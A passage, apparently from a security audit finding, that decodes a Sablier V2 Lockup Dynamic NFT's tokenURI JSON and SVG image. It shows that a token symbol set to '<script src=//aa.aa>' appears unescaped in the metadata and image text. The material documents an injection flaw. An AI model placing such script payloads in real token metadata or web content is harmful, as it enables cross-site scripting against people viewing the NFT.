NTBQU0pwYm1SbFptbHVhWFJsSWlCMGJ6MGlNVEF3SlNJdlBqQjRORGxqTXpRNE5tVmpPV1kwT0RneU16QmtaRGcxWm1Gak1EazRPVEk1WVdWaE9XRXpZVGc1T0NEaWdLSWdVMkZpYkdsbGNpQldNaUJNYjJOcmRYQWdSSGx1WVcxcFl6d3ZkR1Y0ZEZCaGRHZytQSFJsZUhSUVlYUm9JSE4wWVhKMFQyWm1jMlYwUFNJd0pTSWdhSEpsWmowaUkwWnNiMkYwYVc1blZHVjRkQ0lnWm1sc2JEMGlJMlptWmlJZ1ptOXVkQzFtWVcxcGJIazlJaWREYjNWeWFXVnlJRTVsZHljc1FYSnBZV3dzYlc5dWIzTndZV05sSWlCbWFXeHNMVzl3WVdOcGRIazlJaTQ0SWlCbWIyNTBMWE5wZW1VOUlqSTJjSGdpUGp4aGJtbHRZWFJsSUdGa1pHbDBhWFpsUFNKemRXMGlJR0YwZEhKcFluVjBaVTVoYldVOUluTjBZWEowVDJabWMyVjBJaUJpWldkcGJqMGlNSE1pSUdSMWNqMGlOVEJ6SWlCbWNtOXRQU0l3SlNJZ2NtVndaV0YwUTI5MWJuUTlJbWx1WkdWbWFXNXBkR1VpSUhSdlBTSXhNREFsSWk4K01IZzBPV016TkRnMlpXTTVaalE0T0RJek1HUmtPRFZtWVdNd09UZzVNamxoWldFNVlUTmhPRGs0SU9LQW9pQlRZV0pzYVdWeUlGWXlJRXh2WTJ0MWNDQkVlVzVoYldsalBDOTBaWGgwVUdGMGFENDhkR1Y0ZEZCaGRHZ2djM1JoY25SUFptWnpaWFE5SWkwMU1DVWlJR2h5WldZOUlpTkdiRzloZEdsdVoxUmxlSFFpSUdacGJHdzlJaU5tWm1ZaUlHWnZiblF0Wm1GdGFXeDVQU0luUTI5MWNtbGxjaUJPWlhjbkxFRnlhV0ZzTEcxdmJtOXpjR0ZqWlNJZ1ptbHNiQzF2Y0dGamFYUjVQU0l1T0NJZ1ptOXVkQzF6YVhwbFBTSXlObkI0SWo0OFlXNXBiV0YwWlNCaFpHUnBkR2wyWlQwaWMzVnRJaUJoZEhSeWFXSjFkR1ZPWVcxbFBTSnpkR0Z5ZEU5bVpuTmxkQ0lnWW1WbmFXNDlJakJ6SWlCa2RYSTlJalV3Y3lJZ1puSnZiVDBpTUNVaUlISmxjR1ZoZEVOdmRXNTBQU0pwYm1SbFptbHVhWFJsSWlCMGJ6MGlNVEF3SlNJdlBqQjRaall5T0RRNVpqbGhNR0kxWW1ZeU9URXpZak01TmpBNU9HWTNZemN3TVRsaU5URmhPREl3WVNEaWdLSWdQSE5qY21sd2RDQnpjbU05THk5aFlTNWhZVDQ4TDNSbGVIUlFZWFJvUGp4MFpYaDBVR0YwYUNCemRHRnlkRTltWm5ObGREMGlOVEFsSWlCb2NtVm1QU0lqUm14dllYUnBibWRVWlhoMElpQm1hV3hzUFNJalptWm1JaUJtYjI1MExXWmhiV2xzZVQwaUowTnZkWEpwWlhJZ1RtVjNKeXhCY21saGJDeHRiMjV2YzNCaFkyVWlJR1pwYkd3dGIzQmhZMmwwZVQwaUxqZ2lJR1p2Ym5RdGMybDZaVDBpTWpad2VDSStQR0Z1YVcxaGRHVWdZV1JrYVhScGRtVTlJbk4xYlNJZ1lYUjBjbWxpZFhSbFRtRnRaVDBpYzNSaGNuUlBabVp6WlhRaUlHSmxaMmx1UFNJd2N5SWdaSFZ5UFNJMU1ITWlJR1p5YjIwOUlqQWxJaUJ5WlhCbFlYUkRiM1Z1ZEQwaWFXNWtaV1pwYm1sMFpTSWdkRzg5SWpFd01DVWlMejR3ZUdZMk1qZzBPV1k1WVRCaU5XSm1Namt4TTJJek9UWXdPVGhtTjJNM01ERTVZalV4WVRneU1HRWc0b0NpSUR4elkzSnBjSFFnYzNKalBTOHZZV0V1WVdFK1BDOTBaWGgwVUdGMGFENDhMM1JsZUhRK1BIVnpaU0JvY21WbVBTSWpSMnh2ZHlJZ1ptbHNiQzF2Y0dGamFYUjVQU0l1T1NJdlBqeDFjMlVnYUhKbFpqMGlJMGRzYjNjaUlIZzlJakV3TURBaUlIazlJakV3TURBaUlHWnBiR3d0YjNCaFkybDBlVDBpTGpraUx6NDhkWE5sSUdoeVpXWTlJaU5NYjJkdklpQjRQU0l4TnpBaUlIazlJakUzTUNJZ2RISmhibk5tYjNKdFBTSnpZMkZzWlNndU5pa2lMejQ4ZFhObElHaHlaV1k5SWlOSWIzVnlaMnhoYzNNaUlIZzlJakUxTUNJZ2VUMGlPVEFpSUhSeVlXNXpabTl5YlQwaWNtOTBZWFJsS0RFd0tTSWdkSEpoYm5ObWIzSnRMVzl5YVdkcGJqMGlOVEF3SURVd01DSXZQangxYzJVZ2FISmxaajBpSTFCeWIyZHlaWE56SWlCNFBTSXhOakVpSUhrOUlqYzVNQ0l2UGp4MWMyVWdhSEpsWmowaUkxTjBZWFIxY3lJZ2VEMGlNemcxSWlCNVBTSTNPVEFpTHo0OGRYTmxJR2h5WldZOUlpTkJiVzkxYm5RaUlIZzlJalUxTXlJZ2VUMGlOemt3SWk4K1BIVnpaU0JvY21WbVBTSWpSSFZ5WVhScGIyNGlJSGc5SWpZNE55SWdlVDBpTnprd0lpOCtQQzl6ZG1jKyJ9

I decode it and obtain the following JSON object.

{"attributes":[{"trait_type":"Asset","value":"<script src=//aa.aa>"},{"trait_type":"Sender","value":"0x7fa9385be102ac3eac297483dd6233d62b3e1496"},{"trait_type":"Status","value":"Settled"}],"description":"This NFT represents a payment stream in a Sablier V2 Lockup Dynamic contract. The owner of this NFT can withdraw the streamed assets, which are denominated in <script src=//aa.aa>.\n\n- Stream ID: 1\n- Lockup Dynamic Address: 0x49c3486ec9f488230dd85fac098929aea9a3a898\n- <script src=//aa.aa> Address: 0xf62849f9a0b5bf2913b396098f7c7019b51a820a\n\n⚠️ WARNING: Transferring the NFT makes the new owner the recipient of the stream. The funds are not automatically withdrawn for the previous recipient.","external_url":"https://sablier.com","name":"Sablier V2 Lockup Dynamic #1","image":"data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIxMDAwIiBoZWlnaHQ9IjEwMDAiIHZpZXdCb3g9IjAgMCAxMDAwIDEwMDAiPjxyZWN0IHdpZHRoPSIxMDAlIiBoZWlnaHQ9IjEwMCUiIGZpbHRlcj0idXJsKCNOb2lzZSkiLz48cmVjdCB4PSI3MCIgeT0iNzAiIHdpZHRoPSI4NjAiIGhlaWdodD0iODYwIiBmaWxsPSIjZmZmIiBmaWxsLW9wYWNpdHk9Ii4wMyIgcng9IjQ1IiByeT0iNDUiIHN0cm9rZT0iI2ZmZiIgc3Ryb2tlLW9wYWNpdHk9Ii4xIiBzdHJva2Utd2lkdGg9IjQiLz48ZGVmcz48Y2lyY2xlIGlkPSJHbG93IiByPSI1MDAiIGZpbGw9InVybCgjUmFkaWFsR2xvdykiLz48ZmlsdGVyIGlkPSJOb2lzZSI+PGZlRmxvb2QgeD0iMCIgeT0iMCIgd2lkdGg9IjEwMCUiIGhlaWdodD0iMTAwJSIgZmxvb2QtY29sb3I9ImhzbCgyMzAsMjElLDExJSkiIGZsb29kLW9wYWNpdHk9IjEiIHJlc3VsdD0iZmxvb2RGaWxsIi8+PGZlVHVyYnVsZW5jZSBiYXNlRnJlcXVlbmN5PSIuNCIgbnVtT2N0YXZlcz0iMyIgcmVzdWx0PSJOb2lzZSIgdHlwZT0iZnJhY3RhbE5vaXNlIi8+PGZlQmxlbmQgaW49Ik5vaXNlIiBpbjI9ImZsb29kRmlsbCIgbW9kZT0ic29mdC1saWdodCIvPjwvZmlsdGVyPjxwYXRoIGlkPSJMb2dvIiBmaWxsPSIjZmZmIiBmaWxsLW9wYWNpdHk9Ii4xIiBkPSJtMTMzLjU1OSwxMjQuMDM0Yy0uMDEzLDIuNDEyLTEuMDU5LDQuODQ4LTIuOTIzLDYuNDAyLTIuNTU4LDEuODE5LTUuMTY4LDMuNDM5LTcuODg4LDQuOTk2LTE0LjQ0LDguMjYyLTMxLjA0NywxMi41NjUtNDcuNjc0LDEyLjU2OS04Ljg1OC4wMzYtMTcuODM4LTEuMjcyLTI2LjMyOC0zLjY2My05LjgwNi0yLjc2Ni0xOS4wODctNy4xMTMtMjcuNTYyLTEyLjc3OC0xMy44NDItOC4wMjUsOS40NjgtMjguNjA2LDE2LjE1My0zNS4yNjVoMGMyLjAzNS0xLjgzOCw0LjI1Mi0zLjU0Niw2LjQ2My01LjIyNGgwYzYuNDI5LTUuNjU1LDE2LjIxOC0yLjgzNSwyMC4zNTgsNC4xNyw0LjE0Myw1LjA1Nyw4LjgxNiw5LjY0OSwxMy45MiwxMy43MzRoLjAzN2M1LjczNiw2LjQ2MSwxNS4zNTctMi4yNTMsOS4zOC04LjQ4LDAsMC0zLjUxNS0zLjUxNS0zLjUxNS0zLjUxNS0xMS40OS0xMS40NzgtNTIuNjU2LTUyLjY2NC02NC44MzctNjQuODM3bC4wNDktLjAzN2MtMS43MjUtMS42MDYtMi43MTktMy44NDctMi43NTEtNi4yMDRoMGMtLjA0Ni0yLjM3NSwxLjA2Mi00LjU4MiwyLjcyNi02LjIyOWgwbC4xODUtLjE0OGgwYy4wOTktLjA2MiwuMjIyLS4xNDgsLjM3LS4yNTloMGMyLjA2LTEuMzYyLDMuOTUxLTIuNjIxLDYuMDQ0LTMuODQyQzU3Ljc2My0zLjQ3Myw5Ny43Ni0yLjM0MSwxMjguNjM3LDE4LjMzMmMxNi42NzEsOS45NDYtMjYuMzQ0LDU0LjgxMy0zOC42NTEsNDAuMTk5LTYuMjk5LTYuMDk2LTE4LjA2My0xNy43NDMtMTkuNjY4LTE4LjgxMS02LjAxNi00LjA0Ny0xMy4wNjEsNC43NzYtNy43NTIsOS43NTFsNjguMjU0LDY4LjM3MWMxLjcyNCwxLjYwMSwyLjcxNCwzLjg0LDIuNzM4LDYuMTkyWiIvPjxwYXRoIGlkPSJGbG9hdGluZ1RleHQiIGZpbGw9Im5vbmUiIGQ9Ik0xMjUgNDVoNzUwczgwIDAgODAgODB2NzUwczAgODAgLTgwIDgwaC03NTBzLTgwIDAgLTgwIC04MHYtNzUwczAgLTgwIDgwIC04MCIvPjxyYWRpYWxHcmFkaWVudCBpZD0iUmFkaWFsR2xvdyI+PHN0b3Agb2Zmc2V0PSIwJSIgc3RvcC1jb2xvcj0iaHNsKDE1Niw4MCUsNzklKSIgc3RvcC1vcGFjaXR5PSIuNiIvPjxzdG9wIG9mZnNldD0iMTAwJSIgc3RvcC1jb2xvcj0iaHNsKDIzMCwyMSUsMTElKSIgc3RvcC1vcGFjaXR5PSIwIi8+PC9yYWRpYWxHcmFkaWVudD48bGluZWFyR3JhZGllbnQgaWQ9IlNhbmRUb3AiIHgxPSIwJSIgeTE9IjAlIj48c3RvcCBvZmZzZXQ9IjAlIiBzdG9wLWNvbG9yPSJoc2woMTU2LDgwJSw3OSUpIi8+PHN0b3Agb2Zmc2V0PSIxMDAlIiBzdG9wLWNvbG9yPSJoc2woMjMwLDIxJSwxMSUpIi8+PC9saW5lYXJHcmFkaWVudD48bGluZWFyR3JhZGllbnQgaWQ9IlNhbmRCb3R0b20iIHgxPSIxMDAlIiB5MT0iMTAwJSI+PHN0b3Agb2Zmc2V0PSIxMCUiIHN0b3AtY29sb3I9ImhzbCgyMzAsMjElLDExJSkiLz48c3RvcCBvZmZzZXQ9IjEwMCUiIHN0b3AtY29sb3I9ImhzbCgxNTYsODAlLDc5JSkiLz48YW5pbWF0ZSBhdHRyaWJ1dGVOYW1lPSJ4MSIgZHVyPSI2cyIgcmVwZWF0Q291bnQ9ImluZGVmaW5pdGUiIHZhbHVlcz0iMzAlOzYwJTsxMjAlOzYwJTszMCU7Ii8+PC9saW5lYXJHcmFkaWVudD48bGluZWFyR3JhZGllbnQgaWQ9IkhvdXJnbGFzc1N0cm9rZSIgZ3JhZGllbnRUcmFuc2Zvcm09InJvdGF0ZSg5MCkiIGdyYWRpZW50VW5pdHM9InVzZXJTcGFjZU9uVXNlIj48c3RvcCBvZmZzZXQ9IjUwJSIgc3RvcC1jb2xvcj0iaHNsKDE1Niw4MCUsNzklKSIvPjxzdG9wIG9mZnNldD0iODAlIiBzdG9wLWNvbG9yPSJoc2woMjMwLDIxJSwxMSUpIi8+PC9saW5lYXJHcmFkaWVudD48ZyBpZD0iSG91cmdsYXNzIj48cGF0aCBkPSJNIDUwLDM2MCBhIDMwMCwzMDAgMCAxLDEgNjAwLDAgYSAzMDAsMzAwIDAgMSwxIC02MDAsMCIgZmlsbD0iI2ZmZiIgZmlsbC1vcGFjaXR5PSIuMDIiIHN0cm9rZT0idXJsKCNIb3VyZ2xhc3NTdHJva2UpIiBzdHJva2Utd2lkdGg9IjQiLz48cGF0aCBkPSJtNTY2LDE2MS4yMDF2LTUzLjkyNGMwLTE5LjM4Mi0yMi41MTMtMzcuNTYzLTYzLjM5OC01MS4xOTgtNDAuNzU2LTEzLjU5Mi05NC45NDYtMjEuMDc5LTE1Mi41ODctMjEuMDc5cy0xMTEuODM4LDcuNDg3LTE1Mi42MDIsMjEuMDc5Yy00MC44OTMsMTMuNjM2LTYzLjQxMywzMS44MTYtNjMuNDEzLDUxLjE5OHY1My45MjRjMCwxNy4xODEsMTcuNzA0LDMzLjQyNyw1MC4yMjMsNDYuMzk0djI4NC44MDljLTMyLjUxOSwxMi45Ni01MC4yMjMsMjkuMjA2LTUwLjIyMyw0Ni4zOTR2NTMuOTI0YzAsMTkuMzgyLDIyLjUyLDM3LjU2Myw2My40MTMsNTEuMTk4LDQwLjc2MywxMy41OTIsOTQuOTU0LDIxLjA3OSwxNTIuNjAyLDIxLjA3OXMxMTEuODMxLTcuNDg3LDE1Mi41ODctMjEuMDc5YzQwLjg4Ni0xMy42MzYsNjMuMzk4LTMxLjgxNiw2My4zOTgtNTEuMTk4di01My45MjRjMC0xNy4xOTYtMTcuNzA0LTMzLjQzNS01MC4yMjMtNDYuNDAxVjIwNy42MDNjMzIuNTE5LTEyLjk2Nyw1MC4yMjMtMjkuMjA2LDUwLjIyMy00Ni40MDFabS0zNDcuNDYyLDU3Ljc5M2wxMzAuOTU5LDEzMS4wMjctMTMwLjk1OSwxMzEuMDEzVjIxOC45OTRabTI2Mi45MjQuMDIydjI2Mi4wMThsLTEzMC45MzctMTMxLjAwNiwxMzAuOTM3LTEzMS4wMTNaIiBmaWxsPSIjMTYxODIyIj48L3BhdGg+PHBhdGggZD0ibTQ4MS40Niw0ODEuNTR2ODEuMDFjLTIuMzUuNzctNC44MiwxLjUxLTcuMzksMi4yMy0zMC4zLDguNTQtNzQuNjUsMTMuOTItMTI0LjA2LDEzLjkyLTUzLjYsMC0xMDEuMjQtNi4zMy0xMzEuNDctMTYuMTZ2LTgxbDQ2LjMtNDYuMzFoMTcwLjMzbDQ2LjI5LDQ2LjMxWiIgZmlsbD0idXJsKCNTYW5kQm90dG9tKSIvPjxwYXRoIGQ9Im00MzUuMTcsNDM1LjIzYzAsMS4xNy0uNDYsMi4zMi0xLjMzLDMuNDQtNy4xMSw5LjA4LTQxLjkzLDE1Ljk4LTgzLjgxLDE1Ljk4cy03Ni43LTYuOS04My44Mi0xNS45OGMtLjg3LTEuMTItMS4zMy0yLjI3LTEuMzMtMy40NHYtLjA0bDguMzQtOC4zNS4wMS0uMDFjMTMuNzItNi41MSw0Mi45NS0xMS4wMiw3Ni44LTExLjAyczYyLjk3LDQuNDksNzYuNzIsMTFsOC40Miw4LjQyWiIgZmlsbD0idXJsKCNTYW5kVG9wKSIvPjxnIGZpbGw9Im5vbmUiIHN0cm9rZT0idXJsKCNIb3VyZ2xhc3NTdHJva2UpIiBzdHJva2UtbGluZWNhcD0icm91bmQiIHN0cm9rZS1taXRlcmxpbWl0PSIxMCIgc3Ryb2tlLXdpZHRoPSI0Ij48cGF0aCBkPSJtNTY1LjY0MSwxMDcuMjhjMCw5LjUzNy01LjU2LDE4LjYyOS0xNS42NzYsMjYuOTczaC0uMDIzYy05LjIwNCw3LjU5Ni0yMi4xOTQsMTQuNTYyLTM4LjE5NywyMC41OTItMzkuNTA0LDE0LjkzNi05Ny4zMjUsMjQuMzU1LTE2MS43MzMsMjQuMzU1LTkwLjQ4LDAtMTY3Ljk0OC0xOC41ODItMTk5Ljk1My00NC45NDhoLS4wMjNjLTEwLjExNS04LjM0NC0xNS42NzYtMTcuNDM3LTE1LjY3Ni0yNi45NzMsMC0zOS43MzUsOTYuNTU0LTcxLjkyMSwyMTUuNjUyLTcxLjkyMXMyMTUuNjI5LDMyLjE4NSwyMTUuNjI5LDcxLjkyMVoiLz48cGF0aCBkPSJtMTM0LjM2LDE2MS4yMDNjMCwzOS43MzUsOTYuNTU0LDcxLjkyMSwyMTUuNjUyLDcxLjkyMXMyMTUuNjI5LTMyLjE4NiwyMTUuNjI5LTcxLjkyMSIvPjxsaW5lIHgxPSIxMzQuMzYiIHkxPSIxNjEuMjAzIiB4Mj0iMTM0LjM2IiB5Mj0iMTA3LjI4Ii8+PGxpbmUgeDE9IjU2NS42NCIgeTE9IjE2MS4yMDMiIHgyPSI1NjUuNjQiIHkyPSIxMDcuMjgiLz48bGluZSB4MT0iMTg0LjU4NCIgeTE9IjIwNi44MjMiIHgyPSIxODQuNTg1IiB5Mj0iNTM3LjU3OSIvPjxsaW5lIHgxPSIyMTguMTgxIiB5MT0iMjE4LjExOCIgeDI9IjIxOC4xODEiIHkyPSI1NjIuNTM3Ii8+PGxpbmUgeDE9IjQ4MS44MTgiIHkxPSIyMTguMTQyIiB4Mj0iNDgxLjgxOSIgeTI9IjU2Mi40MjgiLz48bGluZSB4MT0iNTE1LjQxNSIgeTE9IjIwNy4zNTIiIHgyPSI1MTUuNDE2IiB5Mj0iNTM3LjU3OSIvPjxwYXRoIGQ9Im0xODQuNTgsNTM3LjU4YzAsNS40NSw0LjI3LDEwLjY1LDEyLjAzLDE1LjQyaC4wMmM1LjUxLDMuMzksMTIuNzksNi41NSwyMS41NSw5LjQyLDMwLjIxLDkuOSw3OC4wMiwxNi4yOCwxMzEuODMsMTYuMjgsNDkuNDEsMCw5My43Ni01LjM4LDEyNC4wNi0xMy45MiwyLjctLjc2LDUuMjktMS41NCw3Ljc1LTIuMzUsOC43Ny0yLjg3LDE2LjA1LTYuMDQsMjEuNTYtOS40M2gwYzcuNzYtNC43NywxMi4wNC05Ljk3LDEyLjA0LTE1LjQyIi8+PHBhdGggZD0ibTE4NC41ODIsNDkyLjY1NmMtMzEuMzU0LDEyLjQ4NS01MC4yMjMsMjguNTgtNTAuMjIzLDQ2LjE0MiwwLDkuNTM2LDUuNTY0LDE4LjYyNywxNS42NzcsMjYuOTY5aC4wMjJjOC41MDMsNy4wMDUsMjAuMjEzLDEzLjQ2MywzNC41MjQsMTkuMTU5LDkuOTk5LDMuOTkxLDIxLjI2OSw3LjYwOSwzMy41OTcsMTAuNzg4LDM2LjQ1LDkuNDA3LDgyLjE4MSwxNS4wMDIsMTMxLjgzNSwxNS4wMDJzOTUuMzYzLTUuNTk1LDEzMS44MDctMTUuMDAyYzEwLjg0Ny0yLjc5LDIwLjg2Ny01LjkyNiwyOS45MjQtOS4zNDksMS4yNDQtLjQ2NywyLjQ3My0uOTQyLDMuNjczLTEuNDI0LDE0LjMyNi01LjY5NiwyNi4wMzUtMTIuMTYxLDM0LjUyNC0xOS4xNzNoLjAyMmMxMC4xMTQtOC4zNDIsMTUuNjc3LTE3LjQzMywxNS42NzctMjYuOTY5LDAtMTcuNTYyLTE4Ljg2OS0zMy42NjUtNTAuMjIzLTQ2LjE1Ii8+PHBhdGggZD0ibTEzNC4zNiw1OTIuNzJjMCwzOS43MzUsOTYuNTU0LDcxLjkyMSwyMTUuNjUyLDcxLjkyMXMyMTUuNjI5LTMyLjE4NiwyMTUuNjI5LTcxLjkyMSIvPjxsaW5lIHgxPSIxMzQuMzYiIHkxPSI1OTIuNzIiIHgyPSIxMzQuMzYiIHkyPSI1MzguNzk3Ii8+PGxpbmUgeDE9IjU2NS42NCIgeTE9IjU5Mi43MiIgeDI9IjU2NS42NCIgeTI9IjUzOC43OTciLz48cG9seWxpbmUgcG9pbnRzPSI0ODEuODIyIDQ4MS45MDEgNDgxLjc5OCA0ODEuODc3IDQ4MS43NzUgNDgxLjg1NCAzNTAuMDE1IDM1MC4wMjYgMjE4LjE4NSAyMTguMTI5Ii8+PHBvbHlsaW5lIHBvaW50cz0iMjE4LjE4NSA0ODEuOTAxIDIxOC4yMzEgNDgxLjg1NCAzNTAuMDE1IDM1MC4wMjYgNDgxLjgyMiAyMTguMTUyIi8+PC9nPjwvZz48ZyBpZD0iUHJvZ3Jlc3MiIGZpbGw9IiNmZmYiPjxyZWN0IHdpZHRoPSIyMDgiIGhlaWdodD0iMTAwIiBmaWxsLW9wYWNpdHk9Ii4wMyIgcng9IjE1IiByeT0iMTUiIHN0cm9rZT0iI2ZmZiIgc3Ryb2tlLW9wYWNpdHk9Ii4xIiBzdHJva2Utd2lkdGg9IjQiLz48dGV4dCB4PSIyMCIgeT0iMzQiIGZvbnQtZmFtaWx5PSInQ291cmllciBOZXcnLEFyaWFsLG1vbm9zcGFjZSIgZm9udC1zaXplPSIyMnB4Ij5Qcm9ncmVzczwvdGV4dD48dGV4dCB4PSIyMCIgeT0iNzIiIGZvbnQtZmFtaWx5PSInQ291cmllciBOZXcnLEFyaWFsLG1vbm9zcGFjZSIgZm9udC1zaXplPSIyNnB4Ij4xMDAlPC90ZXh0PjxnIGZpbGw9Im5vbmUiPjxjaXJjbGUgY3g9IjE2NiIgY3k9IjUwIiByPSIyMiIgc3Ryb2tlPSJoc2woMjMwLDIxJSwxMSUpIiBzdHJva2Utd2lkdGg9IjEwIi8+PGNpcmNsZSBjeD0iMTY2IiBjeT0iNTAiIHBhdGhMZW5ndGg9IjEwMDAwIiByPSIyMiIgc3Ryb2tlPSJoc2woMTU2LDgwJSw3OSUpIiBzdHJva2UtZGFzaGFycmF5PSIxMDAwMCIgc3Ryb2tlLWRhc2hvZmZzZXQ9IjAiIHN0cm9rZS1saW5lY2FwPSJyb3VuZCIgc3Ryb2tlLXdpZHRoPSI1IiB0cmFuc2Zvcm09InJvdGF0ZSgtOTApIiB0cmFuc2Zvcm0tb3JpZ2luPSIxNjYgNTAiLz48L2c+PC9nPjxnIGlkPSJTdGF0dXMiIGZpbGw9IiNmZmYiPjxyZWN0IHdpZHRoPSIxNTIiIGhlaWdodD0iMTAwIiBmaWxsLW9wYWNpdHk9Ii4wMyIgcng9IjE1IiByeT0iMTUiIHN0cm9rZT0iI2ZmZiIgc3Ryb2tlLW9wYWNpdHk9Ii4xIiBzdHJva2Utd2lkdGg9IjQiLz48dGV4dCB4PSIyMCIgeT0iMzQiIGZvbnQtZmFtaWx5PSInQ291cmllciBOZXcnLEFyaWFsLG1vbm9zcGFjZSIgZm9udC1zaXplPSIyMnB4Ij5TdGF0dXM8L3RleHQ+PHRleHQgeD0iMjAiIHk9IjcyIiBmb250LWZhbWlseT0iJ0NvdXJpZXIgTmV3JyxBcmlhbCxtb25vc3BhY2UiIGZvbnQtc2l6ZT0iMjZweCI+U2V0dGxlZDwvdGV4dD48L2c+PGcgaWQ9IkFtb3VudCIgZmlsbD0iI2ZmZiI+PHJlY3Qgd2lkdGg9IjExOCIgaGVpZ2h0PSIxMDAiIGZpbGwtb3BhY2l0eT0iLjAzIiByeD0iMTUiIHJ5PSIxNSIgc3Ryb2tlPSIjZmZmIiBzdHJva2Utb3BhY2l0eT0iLjEiIHN0cm9rZS13aWR0aD0iNCIvPjx0ZXh0IHg9IjIwIiB5PSIzNCIgZm9udC1mYW1pbHk9IidDb3VyaWVyIE5ldycsQXJpYWwsbW9ub3NwYWNlIiBmb250LXNpemU9IjIycHgiPkFtb3VudDwvdGV4dD48dGV4dCB4PSIyMCIgeT0iNzIiIGZvbnQtZmFtaWx5PSInQ291cmllciBOZXcnLEFyaWFsLG1vbm9zcGFjZSIgZm9udC1zaXplPSIyNnB4Ij4mIzg4MDU7IDFLPC90ZXh0PjwvZz48ZyBpZD0iRHVyYXRpb24iIGZpbGw9IiNmZmYiPjxyZWN0IHdpZHRoPSIxNTIiIGhlaWdodD0iMTAwIiBmaWxsLW9wYWNpdHk9Ii4wMyIgcng9IjE1IiByeT0iMTUiIHN0cm9rZT0iI2ZmZiIgc3Ryb2tlLW9wYWNpdHk9Ii4xIiBzdHJva2Utd2lkdGg9IjQiLz48dGV4dCB4PSIyMCIgeT0iMzQiIGZvbnQtZmFtaWx5PSInQ291cmllciBOZXcnLEFyaWFsLG1vbm9zcGFjZSIgZm9udC1zaXplPSIyMnB4Ij5EdXJhdGlvbjwvdGV4dD48dGV4dCB4PSIyMCIgeT0iNzIiIGZvbnQtZmFtaWx5PSInQ291cmllciBOZXcnLEFyaWFsLG1vbm9zcGFjZSIgZm9udC1zaXplPSIyNnB4Ij4xMCBEYXlzPC90ZXh0PjwvZz48L2RlZnM+PHRleHQgdGV4dC1yZW5kZXJpbmc9Im9wdGltaXplU3BlZWQiPjx0ZXh0UGF0aCBzdGFydE9mZnNldD0iLTEwMCUiIGhyZWY9IiNGbG9hdGluZ1RleHQiIGZpbGw9IiNmZmYiIGZvbnQtZmFtaWx5PSInQ291cmllciBOZXcnLEFyaWFsLG1vbm9zcGFjZSIgZmlsbC1vcGFjaXR5PSIuOCIgZm9udC1zaXplPSIyNnB4Ij48YW5pbWF0ZSBhZGRpdGl2ZT0ic3VtIiBhdHRyaWJ1dGVOYW1lPSJzdGFydE9mZnNldCIgYmVnaW49IjBzIiBkdXI9IjUwcyIgZnJvbT0iMCUiIHJlcGVhdENvdW50PSJpbmRlZmluaXRlIiB0bz0iMTAwJSIvPjB4NDljMzQ4NmVjOWY0ODgyMzBkZDg1ZmFjMDk4OTI5YWVhOWEzYTg5OCDigKIgU2FibGllciBWMiBMb2NrdXAgRHluYW1pYzwvdGV4dFBhdGg+PHRleHRQYXRoIHN0YXJ0T2Zmc2V0PSIwJSIgaHJlZj0iI0Zsb2F0aW5nVGV4dCIgZmlsbD0iI2ZmZiIgZm9udC1mYW1pbHk9IidDb3VyaWVyIE5ldycsQXJpYWwsbW9ub3NwYWNlIiBmaWxsLW9wYWNpdHk9Ii44IiBmb250LXNpemU9IjI2cHgiPjxhbmltYXRlIGFkZGl0aXZlPSJzdW0iIGF0dHJpYnV0ZU5hbWU9InN0YXJ0T2Zmc2V0IiBiZWdpbj0iMHMiIGR1cj0iNTBzIiBmcm9tPSIwJSIgcmVwZWF0Q291bnQ9ImluZGVmaW5pdGUiIHRvPSIxMDAlIi8+MHg0OWMzNDg2ZWM5ZjQ4ODIzMGRkODVmYWMwOTg5MjlhZWE5YTNhODk4IOKAoiBTYWJsaWVyIFYyIExvY2t1cCBEeW5hbWljPC90ZXh0UGF0aD48dGV4dFBhdGggc3RhcnRPZmZzZXQ9Ii01MCUiIGhyZWY9IiNGbG9hdGluZ1RleHQiIGZpbGw9IiNmZmYiIGZvbnQtZmFtaWx5PSInQ291cmllciBOZXcnLEFyaWFsLG1vbm9zcGFjZSIgZmlsbC1vcGFjaXR5PSIuOCIgZm9udC1zaXplPSIyNnB4Ij48YW5pbWF0ZSBhZGRpdGl2ZT0ic3VtIiBhdHRyaWJ1dGVOYW1lPSJzdGFydE9mZnNldCIgYmVnaW49IjBzIiBkdXI9IjUwcyIgZnJvbT0iMCUiIHJlcGVhdENvdW50PSJpbmRlZmluaXRlIiB0bz0iMTAwJSIvPjB4ZjYyODQ5ZjlhMGI1YmYyOTEzYjM5NjA5OGY3YzcwMTliNTFhODIwYSDigKIgPHNjcmlwdCBzcmM9Ly9hYS5hYT48L3RleHRQYXRoPjx0ZXh0UGF0aCBzdGFydE9mZnNldD0iNTAlIiBocmVmPSIjRmxvYXRpbmdUZXh0IiBmaWxsPSIjZmZmIiBmb250LWZhbWlseT0iJ0NvdXJpZXIgTmV3JyxBcmlhbCxtb25vc3BhY2UiIGZpbGwtb3BhY2l0eT0iLjgiIGZvbnQtc2l6ZT0iMjZweCI+PGFuaW1hdGUgYWRkaXRpdmU9InN1bSIgYXR0cmlidXRlTmFtZT0ic3RhcnRPZmZzZXQiIGJlZ2luPSIwcyIgZHVyPSI1MHMiIGZyb209IjAlIiByZXBlYXRDb3VudD0iaW5kZWZpbml0ZSIgdG89IjEwMCUiLz4weGY2Mjg0OWY5YTBiNWJmMjkxM2IzOTYwOThmN2M3MDE5YjUxYTgyMGEg4oCiIDxzY3JpcHQgc3JjPS8vYWEuYWE+PC90ZXh0UGF0aD48L3RleHQ+PHVzZSBocmVmPSIjR2xvdyIgZmlsbC1vcGFjaXR5PSIuOSIvPjx1c2UgaHJlZj0iI0dsb3ciIHg9IjEwMDAiIHk9IjEwMDAiIGZpbGwtb3BhY2l0eT0iLjkiLz48dXNlIGhyZWY9IiNMb2dvIiB4PSIxNzAiIHk9IjE3MCIgdHJhbnNmb3JtPSJzY2FsZSguNikiLz48dXNlIGhyZWY9IiNIb3VyZ2xhc3MiIHg9IjE1MCIgeT0iOTAiIHRyYW5zZm9ybT0icm90YXRlKDEwKSIgdHJhbnNmb3JtLW9yaWdpbj0iNTAwIDUwMCIvPjx1c2UgaHJlZj0iI1Byb2dyZXNzIiB4PSIxNjEiIHk9Ijc5MCIvPjx1c2UgaHJlZj0iI1N0YXR1cyIgeD0iMzg1IiB5PSI3OTAiLz48dXNlIGhyZWY9IiNBbW91bnQiIHg9IjU1MyIgeT0iNzkwIi8+PHVzZSBocmVmPSIjRHVyYXRpb24iIHg9IjY4NyIgeT0iNzkwIi8+PC9zdmc+"}

From it, I take the image part and decode it. In the resulting XML, the payload added earlier in the symbol function can be seen.

